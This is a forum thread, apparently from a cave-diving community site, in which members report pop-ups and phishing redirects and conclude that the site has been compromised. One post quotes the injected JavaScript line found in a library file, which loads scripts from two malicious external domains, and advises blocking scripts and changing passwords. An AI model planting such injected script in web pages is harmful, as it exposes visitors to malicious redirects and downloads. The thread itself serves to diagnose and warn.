Results 1 to 9 of 9
  1. #1

    Has this site been compromised?

    For the past couple of days, clicking on a link after first entering this site leads to a tab opening on what looks like a phishing site. The messages vary, as do the urls, but this is an example:


  2. #2
    Another one:


  3. #3
    New Member
    Join Date
    Nov 2005
    Location
    Bracknell, Berkshire
    Posts
    1,337
    I know when I type into a reply box it seems to lag like crazy on here sometimes where as all other forums seem ok. Not seen those popups though.

  4. #4
    I will find out what is going on. But I don't get any such problems.
    ah herro

  5. #5
    Quote Originally Posted by graham_hk View Post
    I will find out what is going on. But I don't get any such problems.
    This may help:
    http://labs.sucuri.net/?note=2016-09-23

    I'm also getting pop-ups.
    cheers,
    Paul

    ------------------------------------------------
    The three great lies of diving:
    1. A "Dry" suit
    2. "Stainless" steel
    3. After you have brought the kit, diving is cheap.

  6. #6
    New Member
    Join Date
    May 2008
    Location
    Cam ,Gloucestershire, England
    Posts
    185
    Me to

    Andrew
    http://www.lot46.com Département de Lot cave diving sites and resources.

    http://a-m-ward.blogspot.com

    Cave diving and caving photos.
    http://www.flickr.com/photos/amward/
    http://s5.photobucket.com/albums/y184/AMWard/


  7. #7
    New Member
    Join Date
    May 2014
    Location
    Belgium/Malta/Portugal
    Posts
    11

    Exclamation

    Quote Originally Posted by PBrown View Post
    This may help:
    http://labs.sucuri.net/?note=2016-09-23

    I'm also getting pop-ups.

    I'm pretty confident it has been compromised. But through a different file: /clientscript/yui/connection/connection-min.js

    it includes the line:
    Code:
    document.write("<script type=\"text\/javascript\" src=\"\/\/oei1.gq\"><\/script>"); document.write("<script type=\"text\/javascript\" src=\"\/\/mfio.cf\"><\/script>");
    which will direct to: (DON'T FOLLOW LINKS) go. mobtrks. com and go. pub2srv. com, respectively.

    Install browser add-ons like NoScript, and forbid javascript by default

    Edit:

    These sites are categorised as Malicious sites on mcafee.com:
    https://www.mcafee.com/threat-intell...go.mobtrks.com
    https://www.mcafee.com/threat-intell...go.pub2srv.com

    Some extra info:
    https://latesthackingnews.com/2017/0...ts-126-forums/
    https://www.hackread.com/vbulletin-f...d-data-leaked/

    If direxplorers has somehow been compromised to include these malicious links, I'd say it's safe to assume that the whole user database has been compromised. I'd suggest changing your passwords...
    Last edited by pars; March 14th, 2017 at 01:32 PM. Reason: Some more info

  8. #8
    FYI I'm still getting these. Today it started trying to download a file (that I didn't request), and I'm getting repeated pop ups, the site is clearly compromised.

  9. #9
    Quote Originally Posted by huwporter View Post
    FYI I'm still getting these. Today it started trying to download a file (that I didn't request), and I'm getting repeated pop ups, the site is clearly compromised.
    Me too now - we have a geek trying to fix it.
    ah herro

 

 

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •